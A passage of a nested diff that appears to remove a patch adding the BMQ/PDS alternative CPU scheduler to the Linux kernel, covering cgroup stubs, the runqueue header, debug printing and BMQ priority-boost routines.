-+static void sched_free_group_rcu(struct rcu_head *rhp)
-+{
-+	sched_free_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+static void sched_unregister_group(struct task_group *tg)
-+{
-+	/*
-+	 * We have to wait for yet another RCU grace period to expire, as
-+	 * print_cfs_stats() might run concurrently.
-+	 */
-+	call_rcu(&tg->rcu, sched_free_group_rcu);
-+}
-+
-+/* allocate runqueue etc for a new task group */
-+struct task_group *sched_create_group(struct task_group *parent)
-+{
-+	struct task_group *tg;
-+
-+	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
-+	if (!tg)
-+		return ERR_PTR(-ENOMEM);
-+
-+	return tg;
-+}
-+
-+void sched_online_group(struct task_group *tg, struct task_group *parent)
-+{
-+}
-+
-+/* rcu callback to free various structures associated with a task group */
-+static void sched_unregister_group_rcu(struct rcu_head *rhp)
-+{
-+	/* Now it should be safe to free those cfs_rqs: */
-+	sched_unregister_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+void sched_destroy_group(struct task_group *tg)
-+{
-+	/* Wait for possible concurrent references to cfs_rqs complete: */
-+	call_rcu(&tg->rcu, sched_unregister_group_rcu);
-+}
-+
-+void sched_release_group(struct task_group *tg)
-+{
-+}
-+
-+static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
-+{
-+	return css ? container_of(css, struct task_group, css) : NULL;
-+}
-+
-+static struct cgroup_subsys_state *
-+cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
-+{
-+	struct task_group *parent = css_tg(parent_css);
-+	struct task_group *tg;
-+
-+	if (!parent) {
-+		/* This is early initialization for the top cgroup */
-+		return &root_task_group.css;
-+	}
-+
-+	tg = sched_create_group(parent);
-+	if (IS_ERR(tg))
-+		return ERR_PTR(-ENOMEM);
-+	return &tg->css;
-+}
-+
-+/* Expose task group only after completing cgroup initialization */
-+static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+	struct task_group *parent = css_tg(css->parent);
-+
-+	if (parent)
-+		sched_online_group(tg, parent);
-+	return 0;
-+}
-+
-+static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	sched_release_group(tg);
-+}
-+
-+static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	/*
-+	 * Relies on the RCU grace period between css_released() and this.
-+	 */
-+	sched_unregister_group(tg);
-+}
-+
-+#ifdef CONFIG_RT_GROUP_SCHED
-+static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static void cpu_cgroup_attach(struct cgroup_taskset *tset)
-+{
-+}
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+static DEFINE_MUTEX(shares_mutex);
-+
-+int sched_group_set_shares(struct task_group *tg, unsigned long shares)
-+{
-+	/*
-+	 * We can't change the weight of the root cgroup.
-+	 */
-+	if (&root_task_group == tg)
-+		return -EINVAL;
-+
-+	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
-+
-+	mutex_lock(&shares_mutex);
-+	if (tg->shares == shares)
-+		goto done;
-+
-+	tg->shares = shares;
-+done:
-+	mutex_unlock(&shares_mutex);
-+	return 0;
-+}
-+
-+static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
-+				struct cftype *cftype, u64 shareval)
-+{
-+	if (shareval > scale_load_down(ULONG_MAX))
-+		shareval = MAX_SHARES;
-+	return sched_group_set_shares(css_tg(css), scale_load(shareval));
-+}
-+
-+static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
-+			       struct cftype *cft)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	return (u64) scale_load_down(tg->shares);
-+}
-+#endif
-+
-+static struct cftype cpu_legacy_files[] = {
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	{
-+		.name = "shares",
-+		.read_u64 = cpu_shares_read_u64,
-+		.write_u64 = cpu_shares_write_u64,
-+	},
-+#endif
-+	{ }	/* Terminate */
-+};
-+
-+
-+static struct cftype cpu_files[] = {
-+	{ }	/* terminate */
-+};
-+
-+static int cpu_extra_stat_show(struct seq_file *sf,
-+			       struct cgroup_subsys_state *css)
-+{
-+	return 0;
-+}
-+
-+struct cgroup_subsys cpu_cgrp_subsys = {
-+	.css_alloc	= cpu_cgroup_css_alloc,
-+	.css_online	= cpu_cgroup_css_online,
-+	.css_released	= cpu_cgroup_css_released,
-+	.css_free	= cpu_cgroup_css_free,
-+	.css_extra_stat_show = cpu_extra_stat_show,
-+#ifdef CONFIG_RT_GROUP_SCHED
-+	.can_attach	= cpu_cgroup_can_attach,
-+#endif
-+	.attach		= cpu_cgroup_attach,
-+	.legacy_cftypes	= cpu_files,
-+	.legacy_cftypes	= cpu_legacy_files,
-+	.dfl_cftypes	= cpu_files,
-+	.early_init	= true,
-+	.threaded	= true,
-+};
-+#endif	/* CONFIG_CGROUP_SCHED */
-+
-+#undef CREATE_TRACE_POINTS
-diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
-new file mode 100644
-index 000000000000..1212a031700e
---- /dev/null
-+++ b/kernel/sched/alt_debug.c
-@@ -0,0 +1,31 @@
-+/*
-+ * kernel/sched/alt_debug.c
-+ *
-+ * Print the alt scheduler debugging details
-+ *
-+ * Author: Alfred Chen
-+ * Date  : 2020
-+ */
-+#include "sched.h"
-+
-+/*
-+ * This allows printing both to /proc/sched_debug and
-+ * to the console
-+ */
-+#define SEQ_printf(m, x...)			\
-+ do {						\
-+	if (m)					\
-+		seq_printf(m, x);		\
-+	else					\
-+		pr_cont(x);			\
-+ } while (0)
-+
-+void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
-+			  struct seq_file *m)
-+{
-+	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
-+						get_nr_threads(p));
-+}
-+
-+void proc_sched_set_task(struct task_struct *p)
-+{}
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-new file mode 100644
-index 000000000000..c32403ed82b6
---- /dev/null
-+++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,668 @@
-+#ifndef ALT_SCHED_H
-+#define ALT_SCHED_H
-+
-+#include <linux/context_tracking.h>
-+#include <linux/profile.h>
-+#include <linux/psi.h>
-+#include <linux/stop_machine.h>
-+#include <linux/syscalls.h>
-+#include <linux/tick.h>
-+
-+#include <trace/events/power.h>
-+#include <trace/events/sched.h>
-+
-+#include "../workqueue_internal.h"
-+
-+#include "cpupri.h"
-+
-+#ifdef CONFIG_SCHED_BMQ
-+/* bits:
-+ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
-+#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
-+#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
-+#endif /* CONFIG_SCHED_PDS */
-+
-+#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
-+extern void resched_latency_warn(int cpu, u64 latency);
-+#else
-+# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
-+static inline void resched_latency_warn(int cpu, u64 latency) {}
-+#endif
-+
-+/*
-+ * Increase resolution of nice-level calculations for 64-bit architectures.
-+ * The extra resolution improves shares distribution and load balancing of
-+ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
-+ * hierarchies, especially on larger systems. This is not a user-visible change
-+ * and does not change the user-interface for setting shares/weights.
-+ *
-+ * We increase resolution only if we have enough bits to allow this increased
-+ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
-+ * are pretty high and the returns do not justify the increased costs.
-+ *
-+ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
-+ * increase coverage and consistency always enable it on 64-bit platforms.
-+ */
-+#ifdef CONFIG_64BIT
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load_down(w) \
-+({ \
-+	unsigned long __w = (w); \
-+	if (__w) \
-+		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
-+	__w; \
-+})
-+#else
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		(w)
-+# define scale_load_down(w)	(w)
-+#endif
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
-+
-+/*
-+ * A weight of 0 or 1 can cause arithmetics problems.
-+ * A weight of a cfs_rq is the sum of weights of which entities
-+ * are queued on this cfs_rq, so a weight of a entity should not be
-+ * too large, so as the shares value of a task group.
-+ * (The default weight is 1024 - so there's no practical
-+ *  limitation from this.)
-+ */
-+#define MIN_SHARES		(1UL <<  1)
-+#define MAX_SHARES		(1UL << 18)
-+#endif
-+
-+/*
-+ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
-+ */
-+#ifdef CONFIG_SCHED_DEBUG
-+# define const_debug __read_mostly
-+#else
-+# define const_debug const
-+#endif
-+
-+/* task_struct::on_rq states: */
-+#define TASK_ON_RQ_QUEUED	1
-+#define TASK_ON_RQ_MIGRATING	2
-+
-+static inline int task_on_rq_queued(struct task_struct *p)
-+{
-+	return p->on_rq == TASK_ON_RQ_QUEUED;
-+}
-+
-+static inline int task_on_rq_migrating(struct task_struct *p)
-+{
-+	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
-+}
-+
-+/*
-+ * wake flags
-+ */
-+#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
-+#define WF_FORK		0x02		/* child wakeup after fork */
-+#define WF_MIGRATED	0x04		/* internal use, task got migrated */
-+
-+#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
-+
-+struct sched_queue {
-+	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
-+	struct list_head heads[SCHED_BITS];
-+};
-+
-+struct rq;
-+struct balance_callback {
-+	struct balance_callback *next;
-+	void (*func)(struct rq *rq);
-+};
-+
-+/*
-+ * This is the main, per-CPU runqueue data structure.
-+ * This data should only be modified by the local cpu.
-+ */
-+struct rq {
-+	/* runqueue lock: */
-+	raw_spinlock_t lock;
-+
-+	struct task_struct __rcu *curr;
-+	struct task_struct *idle, *stop, *skip;
-+	struct mm_struct *prev_mm;
-+
-+	struct sched_queue	queue;
-+#ifdef CONFIG_SCHED_PDS
-+	u64			time_edge;
-+#endif
-+	unsigned long prio;
-+
-+	/* switch count */
-+	u64 nr_switches;
-+
-+	atomic_t nr_iowait;
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	u64 last_seen_need_resched_ns;
-+	int ticks_without_resched;
-+#endif
-+
-+#ifdef CONFIG_MEMBARRIER
-+	int membarrier_state;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+	int cpu;		/* cpu of this runqueue */
-+	bool online;
-+
-+	unsigned int		ttwu_pending;
-+	unsigned char		nohz_idle_balance;
-+	unsigned char		idle_balance;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	struct sched_avg	avg_irq;
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+	int active_balance;
-+	struct cpu_stop_work	active_balance_work;
-+#endif
-+	struct balance_callback	*balance_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+	struct rcuwait		hotplug_wait;
-+#endif
-+	unsigned int		nr_pinned;
-+
-+#endif /* CONFIG_SMP */
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	u64 prev_irq_time;
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+#ifdef CONFIG_PARAVIRT
-+	u64 prev_steal_time;
-+#endif /* CONFIG_PARAVIRT */
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	u64 prev_steal_time_rq;
-+#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
-+
-+	/* For genenal cpu load util */
-+	s32 load_history;
-+	u64 load_block;
-+	u64 load_stamp;
-+
-+	/* calc_load related fields */
-+	unsigned long calc_load_update;
-+	long calc_load_active;
-+
-+	u64 clock, last_tick;
-+	u64 last_ts_switch;
-+	u64 clock_task;
-+
-+	unsigned int  nr_running;
-+	unsigned long nr_uninterruptible;
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+#ifdef CONFIG_SMP
-+	call_single_data_t hrtick_csd;
-+#endif
-+	struct hrtimer		hrtick_timer;
-+	ktime_t			hrtick_time;
-+#endif
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+	/* latency stats */
-+	struct sched_info rq_sched_info;
-+	unsigned long long rq_cpu_time;
-+	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
-+
-+	/* sys_sched_yield() stats */
-+	unsigned int yld_count;
-+
-+	/* schedule() stats */
-+	unsigned int sched_switch;
-+	unsigned int sched_count;
-+	unsigned int sched_goidle;
-+
-+	/* try_to_wake_up() stats */
-+	unsigned int ttwu_count;
-+	unsigned int ttwu_local;
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+#ifdef CONFIG_CPU_IDLE
-+	/* Must be inspected within a rcu lock section */
-+	struct cpuidle_state *idle_state;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#ifdef CONFIG_SMP
-+	call_single_data_t	nohz_csd;
-+#endif
-+	atomic_t		nohz_flags;
-+#endif /* CONFIG_NO_HZ_COMMON */
-+};
-+
-+extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
-+
-+extern unsigned long calc_load_update;
-+extern atomic_long_t calc_load_tasks;
-+
-+extern void calc_global_load_tick(struct rq *this_rq);
-+extern long calc_load_fold_active(struct rq *this_rq, long adjust);
-+
-+DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
-+#define this_rq()		this_cpu_ptr(&runqueues)
-+#define task_rq(p)		cpu_rq(task_cpu(p))
-+#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
-+#define raw_rq()		raw_cpu_ptr(&runqueues)
-+
-+#ifdef CONFIG_SMP
-+#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
-+void register_sched_domain_sysctl(void);
-+void unregister_sched_domain_sysctl(void);
-+#else
-+static inline void register_sched_domain_sysctl(void)
-+{
-+}
-+static inline void unregister_sched_domain_sysctl(void)
-+{
-+}
-+#endif
-+
-+extern bool sched_smp_initialized;
-+
-+enum {
-+	ITSELF_LEVEL_SPACE_HOLDER,
-+#ifdef CONFIG_SCHED_SMT
-+	SMT_LEVEL_SPACE_HOLDER,
-+#endif
-+	COREGROUP_LEVEL_SPACE_HOLDER,
-+	CORE_LEVEL_SPACE_HOLDER,
-+	OTHER_LEVEL_SPACE_HOLDER,
-+	NR_CPU_AFFINITY_LEVELS
-+};
-+
-+DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+
-+static inline int
-+__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
-+{
-+	int cpu;
-+
-+	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
-+		mask++;
-+
-+	return cpu;
-+}
-+
-+static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
-+{
-+	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
-+}
-+
-+extern void flush_smp_call_function_queue(void);
-+
-+#else  /* !CONFIG_SMP */
-+static inline void flush_smp_call_function_queue(void) { }
-+#endif
-+
-+#ifndef arch_scale_freq_tick
-+static __always_inline
-+void arch_scale_freq_tick(void)
-+{
-+}
-+#endif
-+
-+#ifndef arch_scale_freq_capacity
-+static __always_inline
-+unsigned long arch_scale_freq_capacity(int cpu)
-+{
-+	return SCHED_CAPACITY_SCALE;
-+}
-+#endif
-+
-+static inline u64 __rq_clock_broken(struct rq *rq)
-+{
-+	return READ_ONCE(rq->clock);
-+}
-+
-+static inline u64 rq_clock(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ, call to
-+	 * sched_info_xxxx() may not held rq->lock
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock;
-+}
-+
-+static inline u64 rq_clock_task(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ, call to
-+	 * sched_info_xxxx() may not held rq->lock
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock_task;
-+}
-+
-+/*
-+ * {de,en}queue flags:
-+ *
-+ * DEQUEUE_SLEEP  - task is no longer runnable
-+ * ENQUEUE_WAKEUP - task just became runnable
-+ *
-+ */
-+
-+#define DEQUEUE_SLEEP		0x01
-+
-+#define ENQUEUE_WAKEUP		0x01
-+
-+
-+/*
-+ * Below are scheduler API which using in other kernel code
-+ * It use the dummy rq_flags
-+ * ToDo : BMQ need to support these APIs for compatibility with mainline
-+ * scheduler code.
-+ */
-+struct rq_flags {
-+	unsigned long flags;
-+};
-+
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock);
-+
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock);
-+
-+static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
-+	__releases(rq->lock)
-+	__releases(p->pi_lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+}
-+
-+static inline void
-+rq_lock(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+static inline struct rq *
-+this_rq_lock_irq(struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	local_irq_disable();
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	return rq;
-+}
-+
-+static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
-+{
-+	return &rq->lock;
-+}
-+
-+static inline raw_spinlock_t *rq_lockp(struct rq *rq)
-+{
-+	return __rq_lockp(rq);
-+}
-+
-+static inline void lockdep_assert_rq_held(struct rq *rq)
-+{
-+	lockdep_assert_held(__rq_lockp(rq));
-+}
-+
-+extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
-+extern void raw_spin_rq_unlock(struct rq *rq);
-+
-+static inline void raw_spin_rq_lock(struct rq *rq)
-+{
-+	raw_spin_rq_lock_nested(rq, 0);
-+}
-+
-+static inline void raw_spin_rq_lock_irq(struct rq *rq)
-+{
-+	local_irq_disable();
-+	raw_spin_rq_lock(rq);
-+}
-+
-+static inline void raw_spin_rq_unlock_irq(struct rq *rq)
-+{
-+	raw_spin_rq_unlock(rq);
-+	local_irq_enable();
-+}
-+
-+static inline int task_current(struct rq *rq, struct task_struct *p)
-+{
-+	return rq->curr == p;
-+}
-+
-+static inline bool task_on_cpu(struct task_struct *p)
-+{
-+	return p->on_cpu;
-+}
-+
-+extern int task_running_nice(struct task_struct *p);
-+
-+extern struct static_key_false sched_schedstats;
-+
-+#ifdef CONFIG_CPU_IDLE
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+	rq->idle_state = idle_state;
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	WARN_ON(!rcu_read_lock_held());
-+	return rq->idle_state;
-+}
-+#else
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	return NULL;
-+}
-+#endif
-+
-+static inline int cpu_of(const struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	return rq->cpu;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+#include "stats.h"
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#define NOHZ_BALANCE_KICK_BIT	0
-+#define NOHZ_STATS_KICK_BIT	1
-+
-+#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
-+#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
-+
-+#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
-+
-+#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
-+
-+/* TODO: needed?
-+extern void nohz_balance_exit_idle(struct rq *rq);
-+#else
-+static inline void nohz_balance_exit_idle(struct rq *rq) { }
-+*/
-+#endif
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+struct irqtime {
-+	u64			total;
-+	u64			tick_delta;
-+	u64			irq_start_time;
-+	struct u64_stats_sync	sync;
-+};
-+
-+DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
-+
-+/*
-+ * Returns the irqtime minus the softirq time computed by ksoftirqd.
-+ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
-+ * and never move forward.
-+ */
-+static inline u64 irq_time_read(int cpu)
-+{
-+	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
-+	unsigned int seq;
-+	u64 total;
-+
-+	do {
-+		seq = __u64_stats_fetch_begin(&irqtime->sync);
-+		total = irqtime->total;
-+	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
-+
-+	return total;
-+}
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+
-+#ifdef CONFIG_CPU_FREQ
-+DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+extern int __init sched_tick_offload_init(void);
-+#else
-+static inline int sched_tick_offload_init(void) { return 0; }
-+#endif
-+
-+#ifdef arch_scale_freq_capacity
-+#ifndef arch_scale_freq_invariant
-+#define arch_scale_freq_invariant()	(true)
-+#endif
-+#else /* arch_scale_freq_capacity */
-+#define arch_scale_freq_invariant()	(false)
-+#endif
-+
-+extern void schedule_idle(void);
-+
-+#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
-+
-+/*
-+ * !! For sched_setattr_nocheck() (kernel) only !!
-+ *
-+ * This is actually gross. :(
-+ *
-+ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
-+ * tasks, but still be able to sleep. We need this on platforms that cannot
-+ * atomically change clock frequency. Remove once fast switching will be
-+ * available on such platforms.
-+ *
-+ * SUGOV stands for SchedUtil GOVernor.
-+ */
-+#define SCHED_FLAG_SUGOV	0x10000000
-+
-+#ifdef CONFIG_MEMBARRIER
-+/*
-+ * The scheduler provides memory barriers required by membarrier between:
-+ * - prior user-space memory accesses and store to rq->membarrier_state,
-+ * - store to rq->membarrier_state and following user-space memory accesses.
-+ * In the same way it provides those guarantees around store to rq->curr.
-+ */
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+	int membarrier_state;
-+
-+	if (prev_mm == next_mm)
-+		return;
-+
-+	membarrier_state = atomic_read(&next_mm->membarrier_state);
-+	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
-+		return;
-+
-+	WRITE_ONCE(rq->membarrier_state, membarrier_state);
-+}
-+#else
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+}
-+#endif
-+
-+#ifdef CONFIG_NUMA
-+extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
-+#else
-+static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return nr_cpu_ids;
-+}
-+#endif
-+
-+extern void swake_up_all_locked(struct swait_queue_head *q);
-+extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+extern int preempt_dynamic_mode;
-+extern int sched_dynamic_mode(const char *str);
-+extern void sched_dynamic_update(int mode);
-+#endif
-+
-+static inline void nohz_run_idle_balance(int cpu) { }
-+
-+static inline
-+unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
-+				  struct task_struct *p)
-+{
-+	return util;
-+}
-+
-+static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
-+
-+#endif /* ALT_SCHED_H */
-diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
-new file mode 100644
-index 000000000000..66b77291b9d0
---- /dev/null
-+++ b/kernel/sched/bmq.h
-@@ -0,0 +1,110 @@
-+#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+/*
-+ * BMQ only routines
-+ */
-+#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
-+#define boost_threshold(p)	(sched_timeslice_ns >>\
-+				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
-+
-+static inline void boost_task(struct task_struct *p)
-+{
-+	int limit;
-+
-+	switch (p->policy) {
-+	case SCHED_NORMAL:
-+		limit = -MAX_PRIORITY_ADJ;
-+		break;
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		limit = 0;
-+		break;
-+	default:
-+		return;
-+	}
-+
-+	if (p->boost_prio > limit)
-+		p->boost_prio--;
-+}
-+
-+static inline void deboost_task(struct task_struct *p)
-+{
-+	if (p->boost_prio < MAX_PRIORITY_ADJ)
-+		p->boost_prio++;
-+}
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms) {}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	return p->prio + p->boost_prio - MAX_RT_PRIO;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return task_sched_prio(p);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return prio;
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return idx;
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
-+		if (SCHED_RR != p->policy)
-+			deboost_task(p);
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+	}
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
-+
-+inline int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p)
-+{
-+	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
-+		boost_task(p);
-+}
-+#endif
-+
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
-+{
-+	if (rq_switch_time(rq) < boost_threshold(p))
-+		boost_task(p);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq) {}
-diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
-index d9dc9ab3773f..71a25540d65e 100644
---- a/kernel/sched/build_policy.c
-+++ b/kernel/sched/build_policy.c
-@@ -42,13 +42,19 @@
- 
- #include "idle.c"
- 
-+#ifndef CONFIG_SCHED_ALT
- #include "rt.c"
-+#endif
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- # include "cpudeadline.c"
-+#endif
- # include "pelt.c"
- #endif
- 
- #include "cputime.c"
--#include "deadline.c"
- 
-+#ifndef CONFIG_SCHED_ALT
-+#include "deadline.c"
-+#endif
-diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
-index 99bdd96f454f..23f80a86d2d7 100644
---- a/kernel/sched/build_utility.c
-+++ b/kernel/sched/build_utility.c
